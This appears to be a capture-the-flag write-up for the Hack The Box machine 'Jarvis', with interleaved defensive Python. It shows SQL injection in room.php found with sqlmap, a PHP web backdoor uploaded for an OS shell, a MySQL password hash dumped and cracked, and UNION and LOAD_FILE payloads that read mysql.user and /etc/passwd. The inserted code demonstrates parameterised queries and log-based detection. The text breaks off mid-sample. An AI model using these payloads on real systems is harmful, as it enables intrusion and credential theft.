Jarvis (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.143
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 01:23 GMT
Nmap scan report for 10.10.10.143
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
| 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_ 256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 220.51 ms 10.10.14.1
2 220.57 ms 10.10.10.143

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.50 seconds

Open the site in a browser:

http://10.10.10.143/

Back in the terminal, brute-force directories with dirb:

root@kali:~/Downloads# dirb http://10.10.10.143

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Nov 10 01:26:39 2019
URL_BASE: http://10.10.10.143/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.143/ ----
==> DIRECTORY: http://10.10.10.143/css/
==> DIRECTORY: http://10.10.10.143/fonts/
==> DIRECTORY: http://10.10.10.143/images/
+ http://10.10.10.143/index.php (CODE:200|SIZE:23628)
==> DIRECTORY: http://10.10.10.143/js/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/
+ http://10.10.10.143/server-status (CODE:403|SIZE:300)

---- Entering directory: http://10.10.10.143/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.143/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.143/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.143/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.143/phpmyadmin/ ----
+ http://10.10.10.143/phpmyadmin/ChangeLog (CODE:200|SIZE:19186)
==> DIRECTORY: http://10.10.10.143/phpmyadmin/doc/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/examples/
+ http://10.10.10.143/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)
+ http://10.10.10.143/phpmyadmin/index.php (CODE:200|SIZE:15223)
==> DIRECTORY: http://10.10.10.143/phpmyadmin/js/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/libraries/
+ http://10.10.10.143/phpmyadmin/LICENSE (CODE:200|SIZE:18092)
==> DIRECTORY: http://10.10.10.143/phpmyadmin/locale/
+ http://10.10.10.143/phpmyadmin/phpinfo.php (CODE:200|SIZE:15215)
+ http://10.10.10.143/phpmyadmin/README (CODE:200|SIZE:1520)
+ http://10.10.10.143/phpmyadmin/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://10.10.10.143/phpmyadmin/setup/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/sql/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/templates/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/themes/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/tmp/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/vendor/

---- Entering directory: http://10.10.10.143/phpmyadmin/doc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.143/phpmyadmin/examples/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.143/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.143/phpmyadmin/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.143/phpmyadmin/locale/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.143/phpmyadmin/setup/ ----

(!) FATAL: Too many errors connecting to host
(Possible cause: OPERATION TIMEOUT)

-----------------
END_TIME: Sun Nov 10 03:22:22 2019
DOWNLOADED: 10379 - FOUND: 9

Next, view the page source:

view-source:http://10.10.10.143/

The room links carry a numeric id, for example the Superior Family Room at room.php?cod=3. Append a single quote to that id:

http://10.10.10.143/room.php?cod=3%27

So this website might be vulnerable to SQL injection. To test this, we use sqlmap and get information about databases, tables and columns.
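Why a quote in cod breaks the page, as an added illustration that is not the box's code: a constructed in-memory SQLite stand-in for the hotel database (table and column names are assumptions; the 7-column shape is the one sqlmap reports below) queried the concatenated way and the parameterised way, with the UNION payload shape used later in this writeup translated to SQLite syntax.

```python
"""Vulnerable vs. hardened lookup for a numeric id parameter such as room.php?cod=.
Added example; the tables are constructed stand-ins, not the real hotel schema."""
import sqlite3


def build_db():
    """Constructed sample data: one room row and a users table to leak."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE room(cod INTEGER, name TEXT, star INTEGER, price INTEGER,
                          descrip TEXT, mini TEXT, image TEXT);
        INSERT INTO room VALUES (3, 'Superior Family Room', 4, 3, 'desc', 'wifi', 'room3.jpg');
        CREATE TABLE users(user TEXT, password TEXT);
        INSERT INTO users VALUES ('DBadmin', 'HASH_PLACEHOLDER');  -- placeholder, not a real hash
    """)
    return con


def room_vulnerable(con, cod):
    """The pattern this writeup exploits: the request value is spliced into the SQL text,
    so anything after the number becomes part of the query."""
    sql = "SELECT cod, name, star, price, descrip, mini, image FROM room WHERE cod=" + cod
    return con.execute(sql).fetchall()


def room_safe(con, cod):
    """Hardened form: reject anything that is not an integer id, then bind the value as a
    parameter so it can never alter the query structure (either layer alone stops the UNION)."""
    if not cod.isdigit():
        raise ValueError("cod must be an integer id")
    sql = "SELECT cod, name, star, price, descrip, mini, image FROM room WHERE cod=?"
    return con.execute(sql, (int(cod),)).fetchall()


# Same shape as the browser payload in this writeup: 1=2 suppresses the real row and a
# 7-column UNION puts another table's data in column 4, where the page prints the description.
# SQLite uses || for string concatenation where MySQL used group_concat(user,0x3a,password).
UNION_PAYLOAD = "1 AND 1=2 UNION SELECT 1,2,3,user||':'||password,5,6,7 FROM users"


def demo():
    """Returns (rows leaked by the vulnerable query, rows from the safe query for id 3,
    whether the safe query rejected the payload)."""
    con = build_db()
    leaked = room_vulnerable(con, UNION_PAYLOAD)
    safe = room_safe(con, "3")
    try:
        room_safe(con, UNION_PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, safe, blocked


if __name__ == "__main__":
    print(demo())
```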

First confirm the injection point with sqlmap (this run only tests and fingerprints; the shell comes later):

root@kali:~/Downloads# sqlmap -u http://10.10.10.143/room.php?cod=1
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3.10#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:00:18 /2019-11-10/

[05:00:19] [INFO] testing connection to the target URL
[05:00:19] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:00:20] [INFO] testing if the target URL content is stable
[05:00:20] [INFO] target URL content is stable
[05:00:20] [INFO] testing if GET parameter ‘cod’ is dynamic
[05:00:20] [INFO] GET parameter ‘cod’ appears to be dynamic
[05:00:21] [INFO] heuristic (basic) test shows that GET parameter ‘cod’ might be injectable
[05:00:21] [INFO] testing for SQL injection on GET parameter ‘cod’
[05:00:21] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
[05:00:22] [INFO] GET parameter 'cod' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="of")
[05:00:26] [INFO] heuristic (extended) test shows that the back-end DBMS could be ‘MySQL’
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n] y
[05:00:30] [INFO] testing ‘MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)’
[05:00:31] [INFO] testing ‘MySQL >= 5.5 OR error-based – WHERE or HAVING clause (BIGINT UNSIGNED)’
[05:00:31] [INFO] testing ‘MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)’
[05:00:31] [INFO] testing ‘MySQL >= 5.5 OR error-based – WHERE or HAVING clause (EXP)’
[05:00:31] [INFO] testing ‘MySQL >= 5.7.8 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)’
[05:00:32] [INFO] testing ‘MySQL >= 5.7.8 OR error-based – WHERE or HAVING clause (JSON_KEYS)’
[05:00:32] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[05:00:32] [INFO] testing ‘MySQL >= 5.0 OR error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[05:00:32] [INFO] testing ‘MySQL >= 5.1 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)’
[05:00:33] [INFO] testing ‘MySQL >= 5.1 OR error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)’
[05:00:33] [INFO] testing ‘MySQL >= 5.1 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)’
[05:00:33] [INFO] testing ‘MySQL >= 5.1 OR error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)’
[05:00:33] [INFO] testing ‘MySQL >= 4.1 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[05:00:34] [INFO] testing ‘MySQL >= 4.1 OR error-based – WHERE or HAVING clause (FLOOR)’
[05:00:34] [INFO] testing ‘MySQL OR error-based – WHERE or HAVING clause (FLOOR)’
[05:00:35] [INFO] testing ‘MySQL >= 5.1 error-based – PROCEDURE ANALYSE (EXTRACTVALUE)’
[05:00:35] [INFO] testing ‘MySQL >= 5.5 error-based – Parameter replace (BIGINT UNSIGNED)’
[05:00:35] [INFO] testing ‘MySQL >= 5.5 error-based – Parameter replace (EXP)’
[05:00:35] [INFO] testing ‘MySQL >= 5.7.8 error-based – Parameter replace (JSON_KEYS)’
[05:00:36] [INFO] testing ‘MySQL >= 5.0 error-based – Parameter replace (FLOOR)’
[05:00:36] [INFO] testing ‘MySQL >= 5.1 error-based – Parameter replace (UPDATEXML)’
[05:00:36] [INFO] testing ‘MySQL >= 5.1 error-based – Parameter replace (EXTRACTVALUE)’
[05:00:36] [INFO] testing ‘MySQL inline queries’
[05:00:37] [INFO] testing ‘MySQL > 5.0.11 stacked queries (comment)’
[05:00:37] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
[05:00:37] [INFO] testing ‘MySQL > 5.0.11 stacked queries (query SLEEP – comment)’
[05:00:38] [INFO] testing ‘MySQL > 5.0.11 stacked queries (query SLEEP)’
[05:00:38] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[05:00:38] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[05:00:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[05:00:49] [INFO] GET parameter ‘cod’ appears to be ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’ injectable
[05:00:49] [INFO] testing ‘Generic UNION query (NULL) – 1 to 20 columns’
[05:00:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[05:00:50] [INFO] ‘ORDER BY’ technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[05:00:51] [INFO] target URL appears to have 7 columns in query
[05:00:56] [INFO] GET parameter ‘cod’ is ‘Generic UNION query (NULL) – 1 to 20 columns’ injectable
GET parameter ‘cod’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:

Parameter: cod (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: cod=1 AND 9798=9798

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cod=1 AND (SELECT 5908 FROM (SELECT(SLEEP(5)))ROhK)

Type: UNION query
Title: Generic UNION query (NULL) – 7 columns
Payload: cod=-7912 UNION ALL SELECT NULL,NULL,CONCAT(0x7162716a71,0x716953596742754675626445567968597243474972654775745258747a77774f65596862794c504e,0x71706a6b71),NULL,NULL,NULL,NULL-- jhLu

[05:00:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[05:00:59] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/10.10.10.143’

[*] ending @ 05:00:59 /2019-11-10/

The same scan against the jarvis.htb vhost with a browser User-Agent; the session stored from this run is what the --os-shell and --passwords runs below resume:

root@kali:~/Downloads# sqlmap -u http://jarvis.htb/room.php?cod=1 --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"

[*] starting @ 05:02:13 /2019-11-10/

[05:02:13] [INFO] testing connection to the target URL
[05:02:13] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:02:14] [INFO] testing if the target URL content is stable
[05:02:14] [INFO] target URL content is stable
[05:02:14] [INFO] testing if GET parameter ‘cod’ is dynamic
[05:02:14] [INFO] GET parameter ‘cod’ appears to be dynamic
[05:02:15] [INFO] heuristic (basic) test shows that GET parameter ‘cod’ might be injectable
[05:02:15] [INFO] testing for SQL injection on GET parameter ‘cod’
[05:02:15] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
[05:02:17] [INFO] GET parameter 'cod' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="of")
[05:02:21] [INFO] heuristic (extended) test shows that the back-end DBMS could be ‘MySQL’
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n] y
[05:02:38] [INFO] testing ‘MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)’
[05:02:38] [INFO] testing ‘MySQL >= 5.5 OR error-based – WHERE or HAVING clause (BIGINT UNSIGNED)’
[05:02:39] [INFO] testing ‘MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)’
[05:02:39] [INFO] testing ‘MySQL >= 5.5 OR error-based – WHERE or HAVING clause (EXP)’
[05:02:40] [INFO] testing ‘MySQL >= 5.7.8 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)’
[05:02:40] [INFO] testing ‘MySQL >= 5.7.8 OR error-based – WHERE or HAVING clause (JSON_KEYS)’
[05:02:40] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[05:02:40] [INFO] testing ‘MySQL >= 5.0 OR error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[05:02:41] [INFO] testing ‘MySQL >= 5.1 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)’
[05:02:41] [INFO] testing ‘MySQL >= 5.1 OR error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)’
[05:02:41] [INFO] testing ‘MySQL >= 5.1 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)’
[05:02:42] [INFO] testing ‘MySQL >= 5.1 OR error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)’
[05:02:42] [INFO] testing ‘MySQL >= 4.1 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[05:02:42] [INFO] testing ‘MySQL >= 4.1 OR error-based – WHERE or HAVING clause (FLOOR)’
[05:02:43] [INFO] testing ‘MySQL OR error-based – WHERE or HAVING clause (FLOOR)’
[05:02:43] [INFO] testing ‘MySQL >= 5.1 error-based – PROCEDURE ANALYSE (EXTRACTVALUE)’
[05:02:43] [INFO] testing ‘MySQL >= 5.5 error-based – Parameter replace (BIGINT UNSIGNED)’
[05:02:44] [INFO] testing ‘MySQL >= 5.5 error-based – Parameter replace (EXP)’
[05:02:44] [INFO] testing ‘MySQL >= 5.7.8 error-based – Parameter replace (JSON_KEYS)’
[05:02:44] [INFO] testing ‘MySQL >= 5.0 error-based – Parameter replace (FLOOR)’
[05:02:45] [INFO] testing ‘MySQL >= 5.1 error-based – Parameter replace (UPDATEXML)’
[05:02:45] [INFO] testing ‘MySQL >= 5.1 error-based – Parameter replace (EXTRACTVALUE)’
[05:02:45] [INFO] testing ‘MySQL inline queries’
[05:02:46] [INFO] testing ‘MySQL > 5.0.11 stacked queries (comment)’
[05:02:46] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
[05:02:46] [INFO] testing ‘MySQL > 5.0.11 stacked queries (query SLEEP – comment)’
[05:02:46] [INFO] testing ‘MySQL > 5.0.11 stacked queries (query SLEEP)’
[05:02:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[05:02:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[05:02:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[05:02:58] [INFO] GET parameter ‘cod’ appears to be ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’ injectable
[05:02:58] [INFO] testing ‘Generic UNION query (NULL) – 1 to 20 columns’
[05:02:58] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[05:03:05] [INFO] target URL appears to be UNION injectable with 7 columns
[05:03:10] [INFO] GET parameter ‘cod’ is ‘Generic UNION query (NULL) – 1 to 20 columns’ injectable
GET parameter ‘cod’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 88 HTTP(s) requests:

Parameter: cod (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: cod=1 AND 3446=3446

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cod=1 AND (SELECT 9336 FROM (SELECT(SLEEP(5)))WTdc)

Type: UNION query
Title: Generic UNION query (NULL) – 7 columns
Payload: cod=-4903 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162627071,0x446f6768536372567059476e43545a69567973585a587566704f4e4c72494d764f46786d5850527a,0x71707a7671),NULL,NULL,NULL-- CEiS

[05:03:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[05:03:14] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/jarvis.htb’

[*] ending @ 05:03:14 /2019-11-10/

Using the stored session, get an OS shell through a web backdoor that sqlmap writes into the document root:

root@kali:~/Downloads# sqlmap -u http://jarvis.htb/room.php?cod=1 --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0" --os-shell

[*] starting @ 05:03:51 /2019-11-10/

[05:03:51] [INFO] resuming back-end DBMS ‘mysql’
[05:03:51] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: cod (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: cod=1 AND 3446=3446

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cod=1 AND (SELECT 9336 FROM (SELECT(SLEEP(5)))WTdc)

Type: UNION query
Title: Generic UNION query (NULL) – 7 columns
Payload: cod=-4903 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162627071,0x446f6768536372567059476e43545a69567973585a587566704f4e4c72494d764f46786d5850527a,0x71707a7671),NULL,NULL,NULL-- CEiS

[05:03:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[05:03:51] [INFO] going to use a web backdoor for command prompt
[05:03:51] [INFO] fingerprinting the back-end DBMS operating system
[05:03:52] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[05:04:07] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) (‘/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs’) (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: /var/www/html
[05:04:18] [INFO] retrieved web server absolute paths: ‘/images/’
[05:04:18] [INFO] trying to upload the file stager on ‘/var/www/html/’ via LIMIT ‘LINES TERMINATED BY’ method
[05:04:20] [INFO] the file stager has been successfully uploaded on ‘/var/www/html/’ – http://jarvis.htb:80/tmpuumez.php
[05:04:20] [INFO] the backdoor has been successfully uploaded on ‘/var/www/html/’ – http://jarvis.htb:80/tmpbviua.php
[05:04:20] [INFO] calling OS shell. To quit type ‘x’ or ‘q’ and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: ‘www-data’
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] a
command standard output: ‘uid=33(www-data) gid=33(www-data) groups=33(www-data)’
os-shell>

Then dump the MySQL user password hashes and let sqlmap try its dictionary on them:

root@kali:~/Downloads# sqlmap -u http://jarvis.htb/room.php?cod=1 --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0" --passwords

[*] starting @ 05:05:47 /2019-11-10/

[05:05:47] [INFO] resuming back-end DBMS ‘mysql’
[05:05:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: cod (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: cod=1 AND 3446=3446

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cod=1 AND (SELECT 9336 FROM (SELECT(SLEEP(5)))WTdc)

Type: UNION query
Title: Generic UNION query (NULL) – 7 columns
Payload: cod=-4903 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162627071,0x446f6768536372567059476e43545a69567973585a587566704f4e4c72494d764f46786d5850527a,0x71707a7671),NULL,NULL,NULL-- CEiS

[05:05:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[05:05:48] [INFO] fetching database users password hashes
[05:05:48] [INFO] used SQL query returns 1 entry
[05:05:48] [INFO] used SQL query returns 1 entry
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[05:05:51] [INFO] writing hashes to a temporary file ‘/tmp/sqlmapHt2GQo3116/sqlmaphashes-ZuMIcK.txt’
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[05:05:53] [INFO] using hash method ‘mysql_passwd’
what dictionary do you want to use?
[1] default dictionary file ‘/usr/share/sqlmap/data/txt/wordlist.tx_’ (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[05:06:34] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[05:06:39] [INFO] starting dictionary-based cracking (mysql_passwd)
[05:06:39] [INFO] starting 4 processes
[05:06:42] [INFO] cracked password ‘imissyou’ for user ‘DBadmin’
database management system users password hashes:
[*] DBadmin [1]:
password hash: *2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
clear-text password: imissyou

[05:06:47] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/jarvis.htb’

[*] ending @ 05:06:47 /2019-11-10/

The hash is also in CrackStation's tables:

https://crackstation.net/

2D2B7A5E4E637B8FBA1D17F40318F277D29964D0 MySQL4.1+ imissyou

The same hash can be pulled without sqlmap, with a single UNION query typed into the browser:

http://10.10.10.143/room.php?cod=1%20AND%201=2%20UNION%20SELECT%201,2,3,group_concat(user,0x3a,password),5,6,7%20from%20mysql.user#

The injected fourth column is rendered where the room description normally appears, so the page shows:

$ 3 / per night

DBadmin:*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0

LOAD_FILE() reads any file the MySQL account can reach (the account needs the FILE privilege), so the same column position can be used to read /etc/passwd:

http://10.10.10.143/room.php?cod=1%20AND%201=2%20UNION%20ALL%20SELECT%201,2,3,LOAD_FILE(%27/etc/passwd%27),5,6,7%20#

and the page renders the file contents in the description slot:

$ 3 / per night

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
pepper:x:1000:1000:,,,:/home/pepper:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
oscp987://ylENbU061xPB.UxzDd0:0:0:/root:/bin/bash
oscp876:$1$oscp876$j//ylENbU061xPB.UxzDd0:0:0:/root:/bin/bash

Besides the pepper user, note the two trailing oscp987 and oscp876 entries: uid 0 with a password hash in the passwd field, which is not part of a stock Debian install.
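A defender's view of the requests made so far, added here and not part of the original writeup: an Apache access-log checker that flags the payload shapes used above (the AND n=n tautology, SLEEP, the 7-column UNION, LOAD_FILE and the mysql.user read), the sqlmap User-Agent, and requests to the tmpu*/tmpb* stager and backdoor names sqlmap wrote into /var/www/html during the --os-shell run. It also decodes the 0x... literals so the qb..q style boundary markers sqlmap wraps around extracted data become visible. The log lines are constructed to mirror this box's requests; the numeric-parameter list is an assumption about the app.

```python
"""Flag SQL-injection and web-shell activity of the kind shown in this writeup in
Apache combined-format access logs. Added example; log lines are constructed."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample lines modelled on the requests in this writeup (not real captures).
SAMPLE_LOG = r'''
10.10.14.5 - - [10/Nov/2019:05:00:20 +0000] "GET /room.php?cod=1 HTTP/1.1" 200 2140 "-" "sqlmap/1.3.10#stable (http://sqlmap.org)"
10.10.14.5 - - [10/Nov/2019:05:00:22 +0000] "GET /room.php?cod=1%20AND%209798=9798 HTTP/1.1" 200 2140 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.10.14.5 - - [10/Nov/2019:05:00:49 +0000] "GET /room.php?cod=1%20AND%20(SELECT%205908%20FROM%20(SELECT(SLEEP(5)))ROhK) HTTP/1.1" 200 2140 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.10.14.5 - - [10/Nov/2019:05:00:56 +0000] "GET /room.php?cod=-7912%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7162716a71,0x4142,0x71706a6b71),NULL,NULL,NULL,NULL--%20jhLu HTTP/1.1" 200 2011 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
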